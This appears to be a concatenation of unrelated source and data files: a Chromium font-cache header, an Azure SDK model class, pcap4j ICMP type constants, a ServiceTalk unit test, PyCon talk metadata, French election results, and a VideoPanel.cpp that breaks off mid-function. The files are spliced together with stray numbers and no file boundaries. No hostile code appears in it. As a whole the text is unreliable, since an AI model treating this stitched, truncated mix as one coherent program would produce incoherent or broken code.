FontEnumerationCache. // Calls DirectWrite font APIs. Requires Windows 7 with KB2670838 and newer. class CONTENT_EXPORT FontEnumerationCacheWin : public FontEnumerationCache { public: // The constructor is public for internal use of base::SequenceBound. // // Production code should call FontEnumerationCache::Create(). Testing code // should call FontEnumerationCache::CreateForTesting(). FontEnumerationCacheWin(absl::optional<std::string> locale_override, base::PassKey<FontEnumerationCache>); FontEnumerationCacheWin(const FontEnumerationCacheWin&) = delete; FontEnumerationCacheWin& operator=(const FontEnumerationCacheWin&) = delete; ~FontEnumerationCacheWin() override; // A data structure to hold font family results from DirectWrite. struct FamilyDataResult { std::vector<blink::FontEnumerationTable_FontMetadata> fonts; FamilyDataResult(); FamilyDataResult(const FamilyDataResult&) = delete; FamilyDataResult& operator=(const FamilyDataResult&) = delete; ~FamilyDataResult(); }; protected: // FontEnumerationCache: blink::FontEnumerationTable ComputeFontEnumerationData( const std::string& locale) override; private: void PrepareFontEnumerationCache(); SEQUENCE_CHECKER(sequence_checker_); }; } // namespace content #endif // CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_
771
1,350
// Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.hdinsight.models; import com.azure.core.annotation.Fluent; import com.azure.core.util.logging.ClientLogger; import com.fasterxml.jackson.annotation.JsonIgnore; import com.fasterxml.jackson.annotation.JsonProperty; /** The SSH public key for the cluster nodes. */ @Fluent public final class SshPublicKey { @JsonIgnore private final ClientLogger logger = new ClientLogger(SshPublicKey.class); /* * The certificate for SSH. */ @JsonProperty(value = "certificateData") private String certificateData; /** * Get the certificateData property: The certificate for SSH. * * @return the certificateData value. */ public String certificateData() { return this.certificateData; } /** * Set the certificateData property: The certificate for SSH. * * @param certificateData the certificateData value to set. * @return the SshPublicKey object itself. */ public SshPublicKey withCertificateData(String certificateData) { this.certificateData = certificateData; return this; } /** * Validates the instance. * * @throws IllegalArgumentException thrown if the instance is not valid. */ public void validate() { } }
485
757
'''初始化''' from .videoplayer import VideoPlayer
20
1,615
// // MLNGalleryNavigatorView.h // MLN_Example // // Created by MOMO on 2019/11/7. // Copyright © 2019年 MoMo. All rights reserved. // #import <UIKit/UIKit.h> #define kMLNNavigatorHeight 55 NS_ASSUME_NONNULL_BEGIN @interface MLNGalleryNavigationBarItem : NSObject @property (nonatomic, copy) UIImage *image; @property (nonatomic, copy) dispatch_block_t clickActionBlock; @end @interface MLNGalleryNavigationBar : UIView - (void)setLeftItem:(MLNGalleryNavigationBarItem *)leftItem; - (void)setRightItem:(MLNGalleryNavigationBarItem *)rightItem; - (void)setRightItems:(NSArray <MLNGalleryNavigationBarItem *> *)rightItems; - (void)setTitleView:(UIView *)titleView; - (void)setTitle:(NSString *)title; - (void)setMsgNumber:(NSInteger)count; - (UILabel *)defaultTitleLabel; - (UIButton *)rightButtonAtIndex:(NSInteger)index; @end NS_ASSUME_NONNULL_END
310
336
package me.saket.dank.utils.glide; import androidx.annotation.Nullable; import com.bumptech.glide.load.DataSource; import com.bumptech.glide.load.engine.GlideException; import com.bumptech.glide.request.RequestListener; import com.bumptech.glide.request.target.Target; import io.reactivex.exceptions.Exceptions; import io.reactivex.functions.Consumer; import timber.log.Timber; /** * Utility methods related to Glide. */ public class GlideUtils { public static class LambdaRequestListener<R> implements RequestListener<R> { private final Consumer<R> resourceConsumer; private final Consumer<Exception> errorConsumer; public LambdaRequestListener(Consumer<R> resource, Consumer<Exception> error) { this.resourceConsumer = resource; this.errorConsumer = error; } @Override public final boolean onResourceReady(R resource, Object model, Target<R> target, DataSource dataSource, boolean isFirstResource) { try { resourceConsumer.accept(resource); } catch (Exception e) { throw Exceptions.propagate(e); } return false; } @Override public final boolean onLoadFailed(@Nullable GlideException e, Object model, Target<R> target, boolean isFirstResource) { try { errorConsumer.accept(e); } catch (Exception anotherE) { throw Exceptions.propagate(anotherE); } return false; } } public abstract static class SimpleRequestListener<R> implements RequestListener<R> { @Override public final boolean onLoadFailed(@Nullable GlideException e, Object model, Target<R> target, boolean isFirstResource) { onLoadFailed(e); return false; } @Override public final boolean onResourceReady(R resource, Object model, Target<R> target, DataSource dataSource, boolean isFirstResource) { onResourceReady(resource); return false; } public void onResourceReady(R resource) {} public void onLoadFailed(@Nullable Exception e) { if (e != null) { e.printStackTrace(); } else { Timber.e("Couldn't load resourceConsumer"); } } } }
747
973
<reponame>bcaglayan/pcap4j<gh_stars>100-1000 /*_########################################################################## _## _## Copyright (C) 2012-2015 Pcap4J.org _## _########################################################################## */ package org.pcap4j.packet.namednumber; import java.util.HashMap; import java.util.Map; /** * ICMPv4 Type * * @see <a * href="http://www.iana.org/assignments/icmp-parameters/icmp-parameters.xml#icmp-parameters-types">IANA * Registry</a> * @author <NAME> * @since pcap4j 0.9.11 */ public final class IcmpV4Type extends NamedNumber<Byte, IcmpV4Type> { /** */ private static final long serialVersionUID = -6737808159892354431L; /** Echo Reply: 0 */ public static final IcmpV4Type ECHO_REPLY = new IcmpV4Type((byte) 0, "Echo Reply"); /** Destination Unreachable: 3 */ public static final IcmpV4Type DESTINATION_UNREACHABLE = new IcmpV4Type((byte) 3, "Destination Unreachable"); /** Source Quench: 4 */ public static final IcmpV4Type SOURCE_QUENCH = new IcmpV4Type((byte) 4, "Source Quench"); /** Redirect: 5 */ public static final IcmpV4Type REDIRECT = new IcmpV4Type((byte) 5, "Redirect"); /** Alternate Host Address: 6 */ public static final IcmpV4Type ALTERNATE_HOST_ADDRESS = new IcmpV4Type((byte) 6, "Alternate Host Address"); /** Echo: 8 */ public static final IcmpV4Type ECHO = new IcmpV4Type((byte) 8, "Echo"); /** Router Advertisement: 9 */ public static final IcmpV4Type ROUTER_ADVERTISEMENT = new IcmpV4Type((byte) 9, "Router Advertisement"); /** Router Solicitation: 10 */ public static final IcmpV4Type ROUTER_SOLICITATION = new IcmpV4Type((byte) 10, "Router Solicitation"); /** Time Exceeded: 11 */ public static final IcmpV4Type TIME_EXCEEDED = new IcmpV4Type((byte) 11, "Time Exceeded"); /** Parameter Problem: 12 */ public static final IcmpV4Type PARAMETER_PROBLEM = new IcmpV4Type((byte) 12, "Parameter Problem"); /** Timestamp: 13 */ public static final IcmpV4Type TIMESTAMP = new IcmpV4Type((byte) 13, "Timestamp"); /** Timestamp Reply: 14 */ public static final IcmpV4Type TIMESTAMP_REPLY = new IcmpV4Type((byte) 14, "Timestamp Reply"); /** Information Request: 15 */ public static final IcmpV4Type INFORMATION_REQUEST = new IcmpV4Type((byte) 15, "Information Request"); /** Information Reply: 16 */ public static final IcmpV4Type INFORMATION_REPLY = new IcmpV4Type((byte) 16, "Information Reply"); /** Address Mask Request: 17 */ public static final IcmpV4Type ADDRESS_MASK_REQUEST = new IcmpV4Type((byte) 17, "Address Mask Request"); /** Address Mask Reply: 18 */ public static final IcmpV4Type ADDRESS_MASK_REPLY = new IcmpV4Type((byte) 18, "Address Mask Reply"); /** Traceroute: 30 */ public static final IcmpV4Type TRACEROUTE = new IcmpV4Type((byte) 30, "Traceroute"); /** Datagram Conversion Error: 31 */ public static final IcmpV4Type DATAGRAM_CONVERSION_ERROR = new IcmpV4Type((byte) 31, "Datagram Conversion Error"); /** Mobile Host Redirect: 32 */ public static final IcmpV4Type MOBILE_HOST_REDIRECT = new IcmpV4Type((byte) 32, "Mobile Host Redirect"); /** IPv6 Where-Are-You: 33 */ public static final IcmpV4Type IPV6_WHERE_ARE_YOU = new IcmpV4Type((byte) 33, "IPv6 Where-Are-You"); /** IPv6 I-Am-Here: 34 */ public static final IcmpV4Type IPV6_I_AM_HERE = new IcmpV4Type((byte) 34, "IPv6 I-Am-Here"); /** Mobile Registration Request: 35 */ public static final IcmpV4Type MOBILE_REGISTRATION_REQUEST = new IcmpV4Type((byte) 35, "Mobile Registration Request"); /** Mobile Registration Reply: 36 */ public static final IcmpV4Type MOBILE_REGISTRATION_REPLY = new IcmpV4Type((byte) 36, "Mobile Registration Reply"); /** Domain Name Request: 37 */ public static final IcmpV4Type DOMAIN_NAME_REQUEST = new IcmpV4Type((byte) 37, "Domain Name Request"); /** Domain Name Reply: 38 */ public static final IcmpV4Type DOMAIN_NAME_REPLY = new IcmpV4Type((byte) 38, "Domain Name Reply"); /** SKIP: 39 */ public static final IcmpV4Type SKIP = new IcmpV4Type((byte) 39, "SKIP"); /** Photuris: 40 */ public static final IcmpV4Type PHOTURIS = new IcmpV4Type((byte) 40, "Photuris"); private static final Map<Byte, IcmpV4Type> registry = new HashMap<Byte, IcmpV4Type>(); static { registry.put(ECHO_REPLY.value(), ECHO_REPLY); registry.put(DESTINATION_UNREACHABLE.value(), DESTINATION_UNREACHABLE); registry.put(SOURCE_QUENCH.value(), SOURCE_QUENCH); registry.put(REDIRECT.value(), REDIRECT); registry.put(ALTERNATE_HOST_ADDRESS.value(), ALTERNATE_HOST_ADDRESS); registry.put(ECHO.value(), ECHO); registry.put(ROUTER_ADVERTISEMENT.value(), ROUTER_ADVERTISEMENT); registry.put(ROUTER_SOLICITATION.value(), ROUTER_SOLICITATION); registry.put(TIME_EXCEEDED.value(), TIME_EXCEEDED); registry.put(PARAMETER_PROBLEM.value(), PARAMETER_PROBLEM); registry.put(TIMESTAMP.value(), TIMESTAMP); registry.put(TIMESTAMP_REPLY.value(), TIMESTAMP_REPLY); registry.put(INFORMATION_REQUEST.value(), INFORMATION_REQUEST); registry.put(INFORMATION_REPLY.value(), INFORMATION_REPLY); registry.put(ADDRESS_MASK_REQUEST.value(), ADDRESS_MASK_REQUEST); registry.put(ADDRESS_MASK_REPLY.value(), ADDRESS_MASK_REPLY); registry.put(TRACEROUTE.value(), TRACEROUTE); registry.put(DATAGRAM_CONVERSION_ERROR.value(), DATAGRAM_CONVERSION_ERROR); registry.put(MOBILE_HOST_REDIRECT.value(), MOBILE_HOST_REDIRECT); registry.put(IPV6_WHERE_ARE_YOU.value(), IPV6_WHERE_ARE_YOU); registry.put(IPV6_I_AM_HERE.value(), IPV6_I_AM_HERE); registry.put(MOBILE_REGISTRATION_REQUEST.value(), MOBILE_REGISTRATION_REQUEST); registry.put(MOBILE_REGISTRATION_REPLY.value(), MOBILE_REGISTRATION_REPLY); registry.put(DOMAIN_NAME_REQUEST.value(), DOMAIN_NAME_REQUEST); registry.put(DOMAIN_NAME_REPLY.value(), DOMAIN_NAME_REPLY); registry.put(SKIP.value(), SKIP); registry.put(PHOTURIS.value(), PHOTURIS); } /** * @param value value * @param name name */ public IcmpV4Type(Byte value, String name) { super(value, name); } /** * @param value value * @return a IcmpV4Type object. */ public static IcmpV4Type getInstance(Byte value) { if (registry.containsKey(value)) { return registry.get(value); } else { return new IcmpV4Type(value, "unknown"); } } /** * @param type type * @return a IcmpV4Type object. */ public static IcmpV4Type register(IcmpV4Type type) { return registry.put(type.value(), type); } @Override public String valueAsString() { return String.valueOf(value() & 0xFF); } @Override public int compareTo(IcmpV4Type o) { return value().compareTo(o.value()); } }
2,538
435
{ "copyright_text": null, "description": "Python is a language that in a easy way allows to scale up from starter projects to complex applications for data processing and serving dynamic web pages. But as you increase complexity in your applications, it can be easy to introduce potential problems and vulnerabilities. In this talk, I will highlight the biggest problems we can find in python functions, how to use then in a secure way and tools and services that help you identify vulnerabilities in the python source code. These could be the main talking points: -Introduction to secure programming in python. -Introduce dangerous functions for code inyection and how we can solve this issues from a security point of view. -Common attack vectors on Python applications like Remote Command Execution and SQL injection -Best practices for avoid execution of malicious commands -Tools that help us to protect and obfuscate our source code", "duration": 2425, "language": "eng", "recorded": "2018-11-10", "related_urls": [ { "label": "Conference schedule", "url": "http://schedule.pycon18.python.ie/" } ], "speakers": [ "<NAME>" ], "tags": [ "security" ], "thumbnail_url": "https://i.ytimg.com/vi/myqZiiKyiRg/maxresdefault.jpg", "title": "Testing python security", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=myqZiiKyiRg" } ] }
412
785
<reponame>eddie4941/servicetalk<gh_stars>100-1000 /* * Copyright © 2020-2021 Apple Inc. and the ServiceTalk project authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.servicetalk.concurrent.test.internal; import io.servicetalk.concurrent.Cancellable; import io.servicetalk.concurrent.PublisherSource; import org.junit.jupiter.api.Test; import java.util.concurrent.ThreadLocalRandom; import javax.annotation.Nullable; import static io.servicetalk.concurrent.internal.DeliberateException.DELIBERATE_EXCEPTION; import static java.util.concurrent.TimeUnit.MILLISECONDS; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.junit.jupiter.api.Assertions.assertSame; import static org.mockito.Mockito.mock; class TestSingleSubscriberTest { @Test void onSubscribe() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); assertThat(subscriber.pollTerminal(200, MILLISECONDS), is(nullValue())); } @Test void onSubscribeOnComplete() { onSubscribeOnTerminal(true); } @Test void onSubscribeOnError() { onSubscribeOnTerminal(false); } private static void onSubscribeOnTerminal(boolean onComplete) { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); assertThat(subscriber.pollTerminal(200, MILLISECONDS), is(nullValue())); doTerminalSignal(subscriber, onComplete); } @Test void singleItem() { singleItem(ThreadLocalRandom.current().nextInt()); } @Test void singleItemNull() { singleItem(null); } @Test void singleItemCancelBefore() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber).cancel(); subscriber.onSuccess(10); assertThat(subscriber.awaitOnSuccess(), is(10)); } @Test void singleItemCancelAfter() { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); Cancellable c = doOnSubscribe(subscriber); subscriber.onSuccess(10); c.cancel(); assertThat(subscriber.awaitOnSuccess(), is(10)); } private static void singleItem(@Nullable Integer i) { TestSingleSubscriber<Integer> subscriber = new TestSingleSubscriber<>(); doOnSubscribe(subscriber); subscriber.onSuccess(i); assertThat(subscriber.awaitOnSuccess(), is(i)); } private static Cancellable doOnSubscribe(TestSingleSubscriber<Integer> subscriber) { PublisherSource.Subscription subscription = mock(PublisherSource.Subscription.class); subscriber.onSubscribe(subscription); Cancellable realCancellable = subscriber.awaitSubscription(); assertThat(realCancellable, notNullValue()); return realCancellable; } private static void doTerminalSignal(TestSingleSubscriber<Integer> subscriber, boolean onComplete) { if (onComplete) { Integer value = ThreadLocalRandom.current().nextInt(); subscriber.onSuccess(value); assertThat(subscriber.awaitOnSuccess(), is(value)); } else { subscriber.onError(DELIBERATE_EXCEPTION); assertSame(DELIBERATE_EXCEPTION, subscriber.awaitOnError()); } } }
1,464
679
<gh_stars>100-1000 /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _STGIO_HXX #define _STGIO_HXX #include <stgcache.hxx> #include <stgelem.hxx> #include <tools/string.hxx> class StgFATStrm; class StgDataStrm; class StgDirStrm; class String; enum FAT_ERROR { FAT_OK, FAT_WRONGLENGTH, FAT_UNREFCHAIN, FAT_OVERWRITE, FAT_OUTOFBOUNDS, FAT_INMEMORYERROR, FAT_ONFILEERROR, FAT_BOTHERROR }; struct StgLinkArg { String aFile; sal_uLong nErr; }; class StgIo : public StgCache { void SetupStreams(); // load all internal streams sal_Bool bCopied; public: StgIo(); ~StgIo(); StgHeader aHdr; // storage file header StgFATStrm* pFAT; // FAT stream StgDirStrm* pTOC; // TOC stream StgDataStrm* pDataFAT; // small data FAT stream StgDataStrm* pDataStrm; // small data stream short GetDataPageSize(); // get the logical data page size sal_Bool Load(); // load a storage file sal_Bool Init(); // set up an empty file sal_Bool CommitAll(); // commit everything (root commit) static void SetErrorLink( const Link& ); static const Link& GetErrorLink(); sal_uLong ValidateFATs( ); }; #endif
708
348
{"nom":"Chaumercenne","circ":"1ère circonscription","dpt":"Haute-Saône","inscrits":140,"abs":58,"votants":82,"blancs":0,"nuls":9,"exp":73,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":40},{"nuance":"FN","nom":"Mme <NAME>","voix":33}]}
96
524
<reponame>Qt-Widgets/im-desktop-imported<filename>gui/voip/VideoPanel.cpp<gh_stars>100-1000 #include "stdafx.h" #include "VideoPanel.h" #include "DetachedVideoWnd.h" #include "VoipTools.h" #include "MaskPanel.h" #include "../core_dispatcher.h" #include "../main_window/MainPage.h" #include "../main_window/MainWindow.h" #include "../main_window/contact_list/ContactListModel.h" #include "../utils/utils.h" #include "../utils/gui_metrics.h" #include "SelectionContactsForConference.h" #include "../main_window/contact_list/ContactList.h" #include "../main_window/contact_list/ChatMembersModel.h" #include "../controls/ContextMenu.h" #define internal_spacer_w (Utils::scale_value(16)) #define internal_spacer_w4 (Utils::scale_value(16)) #define internal_spacer_w_small (Utils::scale_value(12)) #define DISPLAY_ADD_CHAT_BUTTON 0 enum { kFitSpacerWidth = 560, kNormalModeMinWidth = 560}; Ui::VideoPanel::VideoPanel( QWidget* _parent, QWidget* _container) #ifdef __APPLE__ : BaseBottomVideoPanel(_parent, Qt::Window | Qt::FramelessWindowHint | Qt::WindowDoesNotAcceptFocus | Qt::NoDropShadowWindowHint) #elif defined(__linux__) : BaseBottomVideoPanel(_parent, Qt::Widget) #else : BaseBottomVideoPanel(_parent) #endif , mouseUnderPanel_(false) , container_(_container) , parent_(_parent) , rootWidget_(nullptr) , addChatButton_(nullptr) , fullScreenButton_(nullptr) , stopCallButton_(nullptr) , videoButton_(nullptr) , isTakling(false) , isFadedVisible(false) , localVideoEnabled_(false) , isScreenSharingEnabled_(false) , isCameraEnabled_(true) { #ifndef __linux__ setStyleSheet(Utils::LoadStyle(qsl(":/qss/video_panel"))); setProperty("VideoPanelMain", true); setAttribute(Qt::WA_NoSystemBackground, true); setAttribute(Qt::WA_TranslucentBackground, true); #else setStyleSheet(Utils::LoadStyle(qsl(":/qss/video_panel_linux"))); setProperty("VideoPanelMain", true); #endif rootWidget_ = new QWidget(this); rootWidget_->setContentsMargins(0, 0, 0, 0); rootWidget_->setProperty("VideoPanel", true); QVBoxLayout* mainLayout = Utils::emptyVLayout(); setLayout(mainLayout); QHBoxLayout* layoutTarget = Utils::emptyHLayout(); layoutTarget->setAlignment(Qt::AlignTop); mainLayout->addWidget(rootWidget_); rootWidget_->setLayout(layoutTarget); QWidget* parentWidget = rootWidget_; auto addButton = [this, layoutTarget](QPushButton* btn, const char* _propertyName, const char* _slot, QHBoxLayout* layout = nullptr) { if (_propertyName != NULL) { btn->setProperty(_propertyName, true); } btn->setSizePolicy(QSizePolicy(QSizePolicy::Preferred, QSizePolicy::Expanding)); btn->setCursor(QCursor(Qt::PointingHandCursor)); btn->setFlat(true); (layout ? layout : layoutTarget)->addWidget(btn); #ifdef __APPLE__ connect(btn, &QPushButton::clicked, this, &VideoPanel::activateWindow, Qt::QueuedConnection); #endif connect(btn, SIGNAL(clicked()), this, _slot, Qt::QueuedConnection); }; auto addAndCreateButton = [parentWidget, addButton] (const char* _propertyName, const char* _slot, QHBoxLayout* layout = nullptr)->QPushButton* { QPushButton* btn = new voipTools::BoundBox<QPushButton>(parentWidget); addButton(btn, _propertyName, _slot, layout); return btn; }; layoutTarget->addSpacing(internal_spacer_w_small); /** * We have this layout: * | Left Layout | Center Controls | Right Layout| */ QHBoxLayout* leftLayout = Utils::emptyHLayout(); QHBoxLayout* rightLayout = Utils::emptyHLayout(); goToChat_ = addAndCreateButton("CallGoChat", SLOT(onClickGoChat()), leftLayout); goToChat_->setToolTip(QT_TRANSLATE_NOOP("tooltips", "Open chat page")); leftLayout->addStretch(1); layoutTarget->addLayout(leftLayout, 1); openMasks_ = new MaskWidget(nullptr); addButton(openMasks_, "OpenMasks", SIGNAL(onShowMaskPanel())); openMasks_->setMaskEngineReady(true); layoutTarget->addSpacing(internal_spacer_w); microfone_ = addAndCreateButton("CallEnableMic", SLOT(onCaptureAudioOnOffClicked())); layoutTarget->addSpacing(internal_spacer_w); stopCallButton_ = addAndCreateButton("StopCallButton", SLOT(onHangUpButtonClicked())); stopCallButton_->setToolTip(QT_TRANSLATE_NOOP("tooltips", "End call")); stopCallButton_->setProperty("BigButton", true); layoutTarget->addSpacing(internal_spacer_w); shareScreenButton_ = addAndCreateButton("ShareScreenButtonDisable", SLOT(onShareScreen())); shareScreenButton_->setProperty("BigButton", true); #ifdef __linux__ shareScreenButton_->hide(); #else layoutTarget->addSpacing(internal_spacer_w); #endif videoButton_ = addAndCreateButton(NULL, SLOT(onVideoOnOffClicked())); videoButton_->setProperty("BigButton", true); //layoutTarget->addSpacing(internal_spacer_w); //rightSpacer_ = new QSpacerItem(1, 1, QSizePolicy::MinimumExpanding); //layoutTarget->addSpacerItem(rightSpacer_); rightLayout->addStretch(1); rightLayout->addSpacing(internal_spacer_w); fullScreenButton_ = addAndCreateButton("CallFSOff", SLOT(_onFullscreenClicked()), rightLayout); layoutTarget->addLayout(rightLayout, 1); layoutTarget->addSpacing(internal_spacer_w_small); resetHangupText(); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMediaLocalVideo(bool)), this, SLOT(onVoipMediaLocalVideo(bool)), Qt::DirectConnection); //QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipCallNameChanged(const voip_manager::ContactsList&)), this, SLOT(onVoipCallNameChanged(const voip_manager::ContactsList&)), Qt::DirectConnection); //QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMinimalBandwidthChanged(bool)), this, SLOT(onVoipMinimalBandwidthChanged(bool)), Qt::DirectConnection); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipVideoDeviceSelected(const voip_proxy::device_desc&)), this, SLOT(onVoipVideoDeviceSelected(const voip_proxy::device_desc&)), Qt::DirectConnection); QObject::connect(&Ui::GetDispatcher()->getVoipController(), SIGNAL(onVoipMediaLocalAudio(bool)), this, SLOT(onVoipMediaLocalAudio(bool)), Qt::DirectConnection); //rootEffect_ = std::make_unique<UIEffects>(*rootWidget_, false, true); } Ui::VideoPanel::~VideoPanel() { } void Ui::VideoPanel::keyReleaseEvent(QKeyEvent* _e) { QWidget::keyReleaseEvent(_e); if (_e->key() == Qt::Key_Escape) { emit onkeyEscPressed(); } } void Ui::VideoPanel::controlActivated(bool _activated) { mouseUnderPanel_ = _activated; if (_activated) { emit onMouseEnter(); } else { emit onMouseLeave(); } } void Ui::VideoPanel::onClickGoChat() { if (!activeContact_.empty()) { Ui::GetDispatcher()->getVoipController().openChat(QString::fromStdString(activeContact_[0].contact)); emit onGoToChatButton(); } } void Ui::VideoPanel::setContacts(const std::vector<voip_manager::Contact>& contacts) { activeContact_ = contacts; // Update button visibility. goToChat_->setVisible(contacts.size() == 1); } //void Ui::VideoPanel::onClickAddChat() //{ // assert(false); //} void Ui::VideoPanel::setFullscreenMode(bool _en) { if (!fullScreenButton_) { return; } fullScreenButton_->setProperty("CallFSOff", _en); fullScreenButton_->setProperty("CallFSOn", !_en); fullScreenButton_->setToolTip(_en ? QT_TRANSLATE_NOOP("tooltips", "Exit full screen") : QT_TRANSLATE_NOOP("tooltips", "Full screen")); fullScreenButton_->setStyle(QApplication::style()); } void Ui::VideoPanel::_onFullscreenClicked() { emit onFullscreenClicked(); } void Ui::VideoPanel::enterEvent(QEvent* _e) { QWidget::enterEvent(_e); if (!mouseUnderPanel_) { emit onMouseEnter(); } } void Ui::VideoPanel::leaveEvent(QEvent* _e) { QWidget::leaveEvent(_e); mouseUnderPanel_ = false; emit onMouseLeave(); } void Ui::VideoPanel::resizeEvent(QResizeEvent* _e) { QWidget::resizeEvent(_e); #ifdef __APPLE__ // Forced set fixed size, because under mac we use cocoa to change panel size. setFixedSize(size()); #endif #ifdef __APPLE__ assert(parent_); if (parent_ && !parent_->isFullScreen()) { auto rc = rect(); QPainterPath path(QPointF(0, 0)); path.addRoundedRect(rc.x(), rc.y(), rc.width(), rc.height(), Utils::scale_value(5), Utils::scale_value(5)); QRegion region(path.toFillPolygon().toPolygon()); region = region + QRect(0, 0, rc.width(), Utils::scale_value(5)); setMask(region); } else { clearMask(); } #endif } void Ui::VideoPanel::resetHangupText() { if (stopCallButton_) { stopCallButton_->setText(QString()); stopCallButton_->repaint(); } } void Ui::VideoPanel::onHangUpButtonClicked() { Ui::GetDispatcher()->getVoipController().setHangup(); } void Ui::VideoPanel::onShareScreen() { const QList<voip_proxy::device_desc>& screens = Ui::GetDispatcher()->getVoipController().screenList(); int screenIndex = 0; if (!isScreenSharingEnabled_ && screens.size() > 1) { ContextMenu menu(this); ContextMenu::applyStyle(&menu, false, Utils::scale_value(15), Utils::scale_value(36)); for (int i = 0; i < screens.size(); i++) { menu.addAction(QT_TRANSLATE_NOOP("voip_pages", "Screen") % ql1c(' ') % QString::number(i + 1), [i, this, screens]() { isScreenSharingEnabled_ = !isScreenSharingEnabled_; Ui::GetDispatcher()->getVoipController().switchShareScreen(!screens.empty() ? &screens[i] : nullptr); updateVideoDeviceButtonsState(); }); } menu.exec(QCursor::pos()); } else { isScreenSharingEnabled_ = !isScreenSharingEnabled_; Ui::GetDispatcher()->getVoipController().switchShareScreen(!screens.empty() ? &screens[screenIndex] : nullptr); updateVideoDeviceButtonsState(); } if (isScreenSharingEnabled_) { emit onShareScreenClickOn(); } } void Ui::VideoPanel::onVoipMediaLocalVideo(bool _enabled) { if (!videoButton_) { return; } localVideoEnabled_ = _enabled; updateVideoDeviceButtonsState(); statistic::getGuiMetrics().eventVideocallStartCapturing(); } void Ui::VideoPanel::changeEvent(QEvent* _e) { QWidget::changeEvent(_e); if (_e->type() == QEvent::ActivationChange) { if (isActiveWindow() || (rootWidget_ && rootWidget_->isActiveWindow())) { if (container_) { container_->raise(); raise(); } } } } void Ui::VideoPanel::onVideoOnOffClicked() { if (!(isCameraEnabled_ && localVideoEnabled_)) { emit onCameraClickOn(); } Ui::GetDispatcher()->getVoipController().setSwitchVCaptureMute(); } void Ui::VideoPanel::fadeIn(unsigned int _kAnimationDefDuration) { if (!isFadedVisible) { isFadedVisible = true; #ifndef __linux__ BaseVideoPanel::fadeIn(_kAnimationDefDuration); //rootEffect_->geometryTo(QRect(0, 0, width(), height()), _kAnimationDefDuration); #endif } } void Ui::VideoPanel::fadeOut(unsigned int _kAnimationDefDuration) { if (isFadedVisible) { isFadedVisible = false; #ifndef __linux__ BaseVideoPanel::fadeOut(_kAnimationDefDuration); //rootEffect_->geometryTo(QRect(0, height(), width(), 1), _kAnimationDefDuration); #endif } } void Ui::VideoPanel::forceFinishFade() { BaseVideoPanel::forceFinishFade(); //if (rootEffect_) //{ // rootEffect_->forceFinish(); // rootWidget_->update(); // rootWidget_->setFixedWidth(width()); // rootWidget_->setFixedWidth(QWIDGETSIZE_MAX); //} } bool Ui::VideoPanel::isFadedIn() { return isFadedVisible; } bool Ui::VideoPanel::isActiveWindow() { return QWidget::isActiveWindow(); } bool Ui::VideoPanel::isNormalPanelMode() { auto rc = rect(); return (rc.width() >= Utils::scale_value(kNormalModeMinWidth)); } bool Ui::VideoPanel::isFitSpacersPanelMode() { auto rc = rect(); return (rc.width() < Utils::scale_value(kFitSpacerWidth)); } void Ui::VideoPanel::activateVideoWindow() { parentWidget()->activateWindow(); parentWidget()->raise(); } int Ui::VideoPanel::heightOfCommonPanel() { return rootWidget_->height(); } void Ui::VideoPanel::onVoipVideoDeviceSelected(const voip_proxy::device_desc& desc) { isScreenSharingEnabled_ = (desc.dev_type == voip_proxy::kvoipDevTypeVideoCapture && desc.video_dev_type == voip_proxy::kvoipDeviceDesktop); isCameraEnabled_ = (desc.dev_type == voip_proxy::kvoipDevTypeVideoCapture && desc.video_dev_type == voip_proxy::kvoipDeviceCamera); updateVideoDeviceButtonsState(); } void Ui::VideoPanel::updateVideoDeviceButtonsState() { bool enableCameraButton = localVideoEnabled_ && isCameraEnabled_; bool enableScreenButton = localVideoEnabled_ && isScreenSharingEnabled_; videoButton_->setProperty("CallEnableCam", enableCameraButton); videoButton_->setProperty("CallDisableCam", !enableCameraButton); videoButton_->setToolTip(enableCameraButton ? QT_TRANSLATE_NOOP("tooltips", "Turn off camera") : QT_TRANSLATE_NOOP("tooltips", "Turn on camera")); shareScreenButton_->setProperty("ShareScreenButtonDisable", !enableScreenButton); shareScreenButton_->setProperty("ShareScreenButtonEnable", enableScreenButton); shareScreenButton_->setToolTip(enableScreenButton ? QT_TRANSLATE_NOOP("tooltips", "Turn off screen sharing") : QT_TRANSLATE_NOOP("tooltips", "Turn on screen sharing")); videoButton_->setStyle(QApplication::style()); shareScreenButton_->setStyle(QApplication::style()); } void Ui::VideoPanel::onCaptureAudioOnOffClicked() { Ui::GetDispatcher()->getVoipController().setSwitchACaptureMute(); emit onMicrophoneClick(); } void Ui::VideoPanel::onVoipMediaLocalAudio(bool _enabled) { if (microfone_) { microfone_->setProperty("CallEnableMic", _enabled); 